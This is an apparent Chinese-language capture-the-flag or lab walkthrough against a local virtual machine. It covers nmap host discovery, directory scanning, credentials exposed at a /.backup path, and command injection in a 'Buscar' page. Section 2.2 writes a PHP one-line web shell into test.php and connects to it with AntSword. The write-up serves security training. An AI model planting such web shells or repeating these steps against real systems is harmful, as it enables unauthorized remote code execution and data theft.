1. 信息收集:
1.1. 主机扫描
- 虚拟机->设置->网络适配器->高级->确认物理机地址
- 利用nmap扫描主机地址;
nmap -sn 192.168.7.0/24|grep -B 2 '00:0C:29:A0:08:33'
/*nmap -sn ;执行“ping 扫描”,它仅检查哪些主机在线,而不进行端口扫描。
-B 2 ;grep 在匹配到指定模式的行之前多显示两行内容。B 代表“before”
*/
1.2. 端口扫描
1.3. 目录扫描
2. 通过目录扫描,拼接可能存在利用信息的路径
2.1. 拼接/.backup
存在敏感信息database、username、password;寻找可以利用的点;
2.2. 拼接/site,进入主页
逐个点击页面存在的内容,查看是否有可以利用的点;
逐个点击到Buscar时跳转到空白页面,但是存在疑似可以利用的功能点
尝试是否可以利用
存在回显,可以利用,尝试写入一句话木马;echo '<?php eval($_POST[cmd]);?>' > test.php
查看是否成功写入
尝试使用蚁剑连接->连接成功